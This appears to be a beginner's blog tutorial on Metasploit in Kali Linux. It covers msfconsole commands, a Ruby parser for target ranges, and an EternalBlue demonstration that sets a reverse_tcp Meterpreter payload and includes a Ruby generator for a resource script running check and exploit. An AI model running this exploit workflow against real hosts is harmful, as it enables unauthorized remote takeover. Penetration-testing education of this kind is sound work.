# Metasploit Tutorial

## Preface

Knowledge is power, especially when it’s shared. A collaboration between the open source community and Rapid7, Metasploit helps security teams do more than just verify vulnerabilities, manage security assessments, and improve security awareness; it empowers and arms defenders to always stay one step (or two) ahead of the game.

## Installing Metasploit

I strongly recommend Kali Linux. I genuinely find it excellent: even leaving aside the 200-plus penetration-testing tools it ships with, it is a very capable system in its own right.
Enough preamble; first download Kali. I went straight for the prebuilt Kali virtual machine image, links below:
Kali Linux download
VMware download
Once it is installed, Kali comes with Metasploit preinstalled, alongside other network-security tools such as nmap and netcat that work well together with it.

## Starting Metasploit

First boot Kali Linux; it looks like this:
(screenshot: Kali Linux boot screen)
The default username and password are both kali. Enter them to log in, then click here and type the username and password (kali) again:
(screenshot: root shell)

A note up front: the rest of this tutorial runs as root so that no step fails on a permissions error. Most of msfconsole works fine as the ordinary kali user; root is only needed for things such as privileged nmap scans from db_nmap or listening on ports below 1024, and `sudo msfconsole` is the quickest way to get it when you need it.
In the Kali terminal, copy is Ctrl+Shift+C and paste is Ctrl+Shift+V.

Type msfconsole to enter the msf console:
(screenshot: msfconsole banner)
Next, run help to list the commands; the full output follows, and the same reference is available on the official site.

Core Commands
=============

Command       Description
-------       -----------
?             Help menu
banner        Display an awesome metasploit banner
cd            Change the current working directory
color         Toggle color
connect       Communicate with a host
debug         Display information useful for debugging
exit          Exit the console
features      Display the list of not yet released features that can be opted in to
get           Gets the value of a context-specific variable
getg          Gets the value of a global variable
grep          Grep the output of another command
help          Help menu
history       Show command history
load          Load a framework plugin
quit          Exit the console
repeat        Repeat a list of commands
route         Route traffic through a session
save          Saves the active datastores
sessions      Dump session listings and display information about sessions
set           Sets a context-specific variable to a value
setg          Sets a global variable to a value
sleep         Do nothing for the specified number of seconds
spool         Write console output into a file as well the screen
threads       View and manipulate background threads
tips          Show a list of useful productivity tips
unload        Unload a framework plugin
unset         Unsets one or more context-specific variables
unsetg        Unsets one or more global variables
version       Show the framework and console library version numbers


Module Commands
===============

Command       Description
-------       -----------
advanced      Displays advanced options for one or more modules
back          Move back from the current context
clearm        Clear the module stack
favorite      Add module(s) to the list of favorite modules
info          Displays information about one or more modules
listm         List the module stack
loadpath      Searches for and loads modules from a path
options       Displays global options or for one or more modules
popm          Pops the latest module off the stack and makes it active
previous      Sets the previously loaded module as the current module
pushm         Pushes the active or list of modules onto the module stack
reload_all    Reloads all modules from all defined module paths
search        Searches module names and descriptions
show          Displays modules of a given type, or all modules
use           Interact with a module by name or search term/index



Job Commands
============

Command       Description
-------       -----------
handler       Start a payload handler as job
jobs          Displays and manages jobs
kill          Kill a job
rename_job    Rename a job




Resource Script Commands
========================

Command       Description
-------       -----------
makerc        Save commands entered since start to a file
resource      Run the commands stored in a file




Database Backend Commands
=========================

Command           Description
-------           -----------
analyze           Analyze database information about a specific address or address range
db_connect        Connect to an existing data service
db_disconnect     Disconnect from the current data service
db_export         Export a file containing the contents of the database
db_import         Import a scan result file (filetype will be auto-detected)
db_nmap           Executes nmap and records the output automatically
db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
db_remove         Remove the saved data service entry
db_save           Save the current data service connection as the default to reconnect on startup
db_status         Show the current data service status
hosts             List all hosts in the database
loot              List all loot in the database
notes             List all notes in the database
services          List all services in the database
vulns             List all vulnerabilities in the database
workspace         Switch between database workspaces




Credentials Backend Commands
============================

Command       Description
-------       -----------
creds         List all credentials in the database




Developer Commands
==================

Command       Description
-------       -----------
edit          Edit the current module or a file with the preferred editor
irb           Open an interactive Ruby shell in the current context
log           Display framework.log paged to the end if possible
pry           Open the Pry debugger on the current module or Framework
reload_lib    Reload Ruby library files from specified paths
time          Time how long it takes to run a particular command

msfconsole is the primary interface to Metasploit Framework. There is quite a
lot that needs go here, please be patient and keep an eye on this space!

Many commands and options that take a list of things can use ranges to avoid
having to manually list each desired thing. All ranges are inclusive.

Commands that take a list of IDs can use ranges to help. Individual IDs must be
separated by a , (no space allowed) and ranges can be expressed with either
- or ...

There are several ways to specify ranges of IP addresses that can be mixed
together. The first way is a list of IPs separated by just a (ASCII space),
with an optional ,. The next way is two complete IP addresses in the form of
BEGINNING_ADDRESS-END_ADDRESS like 127.0.1.44-127.0.2.33. CIDR
specifications may also be used, however the whole address must be given to
Metasploit like 127.0.0.0/8 and not 127/8, contrary to the RFC.
Additionally, a netmask can be used in conjunction with a domain name to
dynamically resolve which block to target. All these methods work for both IPv4
and IPv6 addresses. IPv4 addresses can also be specified with special octet
ranges from the NMAP target
specification

Terminate the first sessions:

sessions -k 1

Stop some extra running jobs:

jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

set RHOSTS www.example.test/24
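The range rules above (inclusive ID ranges written with - or .., and RHOSTS targets given as a list, a BEGINNING_ADDRESS-END_ADDRESS pair, a CIDR block with a complete address, or nmap-style octet ranges) are easy to get wrong when scripting around msfconsole. The Ruby below is an added example written for this page, not Metasploit's own Rex::Socket::RangeWalker: it re-implements the documented rules so they can be exercised offline, and leaves out the hostname/netmask form (www.example.test/24), which needs DNS. The sample specs in the demo are constructed.

```ruby
require 'ipaddr'

# Expand an ID list such as "2-6,7,8,11..15" (job or session IDs) into integers.
# Ranges are inclusive and may be written "a-b" or "a..b"; commas only, no spaces.
def expand_ids(spec)
  spec.split(',').flat_map do |part|
    if (m = part.match(/\A(\d+)(?:-|\.\.)(\d+)\z/))
      (m[1].to_i..m[2].to_i).to_a
    else
      [Integer(part, 10)]
    end
  end
end

# True for one complete IPv4 or IPv6 address (IPAddr rejects "127" or "2.5").
def complete_address?(str)
  IPAddr.new(str)
  true
rescue ArgumentError
  false
end

# One nmap-style octet field: "7", "1-4" or "1-4,15" -> list of octet values.
def expand_octet(field)
  field.split(',').flat_map do |piece|
    lo, hi = piece.split('-', 2)
    lo = Integer(lo, 10)
    hi = hi ? Integer(hi, 10) : lo
    raise ArgumentError, "bad octet range #{piece.inspect}" unless lo <= hi && hi <= 255
    (lo..hi).to_a
  end
end

# One whitespace-separated target token -> list of address strings.
def expand_token(tok)
  if tok.include?('/')
    # CIDR. Like Metasploit, IPAddr wants the whole address: 127.0.0.0/8, not 127/8.
    # The hostname/netmask form needs DNS and is deliberately not handled here.
    begin
      return IPAddr.new(tok).to_range.map(&:to_s)
    rescue ArgumentError
      raise ArgumentError, "#{tok}: CIDR needs a complete IPv4/IPv6 address"
    end
  end

  lo, hi = tok.split('-', 2)
  if hi && complete_address?(lo) && complete_address?(hi)
    # BEGINNING_ADDRESS-END_ADDRESS, inclusive, IPv4 or IPv6.
    a = IPAddr.new(lo)
    b = IPAddr.new(hi)
    raise ArgumentError, "#{tok}: mixed address families" unless a.family == b.family
    raise ArgumentError, "#{tok}: end precedes start" if b.to_i < a.to_i
    return (a.to_i..b.to_i).map { |i| IPAddr.new(i, a.family).to_s }
  end

  # A single IPv6 host.
  return [IPAddr.new(tok).to_s] if tok.include?(':') && complete_address?(tok)

  # IPv4, possibly with nmap octet ranges in any field, e.g. 127.0.0-2.1-4,15
  fields = tok.split('.')
  raise ArgumentError, "#{tok}: not a recognised target spec" unless fields.size == 4
  lists = fields.map { |f| expand_octet(f) }
  lists[0].product(*lists[1..-1]).map { |octets| octets.join('.') }
end

# A full RHOSTS-style spec: tokens separated by spaces or ", ". A bare comma
# inside a token belongs to an octet list, as in 127.0.0-2.1-4,15.
def expand_targets(spec)
  spec.strip.split(/,?\s+/).flat_map { |tok| expand_token(tok) }
end

if __FILE__ == $PROGRAM_NAME
  p expand_ids('2-6,7,8,11..15')
  # constructed sample spec mixing all three IPv4 forms
  p expand_targets('10.0.0.0/30, 10.0.0.254-10.0.1.1 127.0.0-1.1-2,15')
end
```

The ID parser and the target parser share the same inclusive-range convention but different separators (a comma joins IDs, while a comma followed by a space separates target tokens), which is exactly the distinction the help text draws.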

## Setting the payload

Common payloads
To select a payload:
set payload <payload path>

Payload: the payload is the code that runs on the target once the exploit has succeeded. In Metasploit it is its own module type: the exploit module triggers the vulnerability to gain code execution on the target, and the payload module chosen with set payload decides what that execution does (open a command shell, start a Meterpreter session, and so on). The exploit gets you in; the payload defines the behaviour once you are in.
  Shellcode: shellcode is the core of a payload, the actual machine instructions that run on the target as the attack payload during exploitation. It is usually written in assembly. In most cases the target only hands back a command-line shell after it has executed these instructions.

## Required settings

Select a module: use <module path>
Show the options that need configuring: options
Set the target: set RHOSTS <target IP or range>, and set RPORT <port> only if the service is not on the module's default port (a common-ports reference helps here)
Set the listener address: set LHOST <IP of your attacking machine>. LHOST is where a reverse payload connects back to, so it is your own address, never the target's.
Set the listener port: set LPORT <port to listen on>
Here I use EternalBlue (MS17-010) as the example:

## EternalBlue attack demonstration

msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.***.***  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168…
lhost => 192.168…
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 1145
lport => 1145
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Finally, type exploit to launch the attack.

Two things the transcript glosses over. First, RHOSTS is marked Required in the options table above and has no default, so it must be set to the target before exploit; without it the module refuses to run. Second, keep the payload architecture consistent with the host you are attacking: the module's default, windows/x64/meterpreter/reverse_tcp as shown under Payload options, is the 64-bit Meterpreter, while the transcript switches to the 32-bit windows/meterpreter/reverse_tcp. With VERIFY_ARCH and VERIFY_TARGET left at true, the module aborts when the remote OS or architecture does not match the selected target instead of firing blindly. Running check before exploit reports whether the host looks vulnerable without sending the exploit itself, which matters with MS17-010 because a failed attempt can crash the target.
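As an added example, not code from this page or from Metasploit itself, the Ruby below models the parts of the workflow above that the transcript skips or gets wrong: option names are case-insensitive (set lhost fills LHOST), a value given with set overrides one given with setg, and exploit will not run while a required option such as RHOSTS is empty. The option table and defaults are transcribed from the options output above; the addresses 192.168.56.10 (attacker) and 192.168.56.20 (target) are hypothetical. Once the datastore validates, it is turned into a resource script, the makerc/resource mechanism listed under Resource Script Commands, that runs check before exploit -j.

```ruby
# Option tables transcribed from the `options` output above (name => required?).
# DEFAULTS is the "Current Setting" column; RHOSTS and LHOST ship empty.
MODULE_OPTIONS  = { 'RHOSTS' => true, 'RPORT' => true, 'SMBDomain' => false,
                    'SMBPass' => false, 'SMBUser' => false,
                    'VERIFY_ARCH' => true, 'VERIFY_TARGET' => true }.freeze
PAYLOAD_OPTIONS = { 'PAYLOAD' => true, 'EXITFUNC' => true,
                    'LHOST' => true, 'LPORT' => true }.freeze
DEFAULTS = { 'RPORT' => '445', 'VERIFY_ARCH' => 'true', 'VERIFY_TARGET' => 'true',
             'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
             'EXITFUNC' => 'thread', 'LPORT' => '4444' }.freeze
MODULE_PATH = 'exploit/windows/smb/ms17_010_eternalblue'.freeze

# Minimal model of the msfconsole datastore: names are case-insensitive,
# a module-local value (set) beats a global one (setg), and the module
# default is used when neither has been given.
class Datastore
  def initialize
    @local = {}
    @global = {}
  end

  def set(name, value)
    @local[name.upcase] = value.to_s
  end

  def setg(name, value)
    @global[name.upcase] = value.to_s
  end

  def unset(name)
    @local.delete(name.upcase)
  end

  def [](name)
    key = name.upcase
    @local[key] || @global[key] || DEFAULTS[key]
  end

  # Required options with no value: the ones `exploit` refuses to run without.
  def missing_required
    MODULE_OPTIONS.merge(PAYLOAD_OPTIONS)
                  .select { |name, required| required && (self[name].nil? || self[name].empty?) }
                  .keys
  end
end

# Turn a validated datastore into the lines of a resource script for
# `msfconsole -r eternalblue.rc`. PAYLOAD is set first because changing the
# payload changes which payload options exist; `check` runs before
# `exploit -j` so a host that does not look vulnerable is never hit.
def resource_script(ds)
  missing = ds.missing_required
  unless missing.empty?
    raise ArgumentError, "required options not set: #{missing.join(', ')}"
  end

  names = ['PAYLOAD'] + (MODULE_OPTIONS.keys + PAYLOAD_OPTIONS.keys - ['PAYLOAD'])
  lines = ["use #{MODULE_PATH}"]
  names.each do |name|
    value = ds[name]
    lines << "set #{name} #{value}" unless value.nil? || value.empty?
  end
  lines + ['check', 'exploit -j']
end

if __FILE__ == $PROGRAM_NAME
  ds = Datastore.new
  ds.setg('LHOST', '192.168.56.10')   # hypothetical attacker address, reused across modules
  ds.set('rhosts', '192.168.56.20')   # hypothetical target
  ds.set('lport', '1145')
  puts resource_script(ds)
end
```

Setting LHOST with setg once per engagement and RHOSTS per module mirrors how the two options differ in scope: the listener address is a property of your machine, the target list is a property of the module run.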

P.S.: This is my first article, so please bear with me.
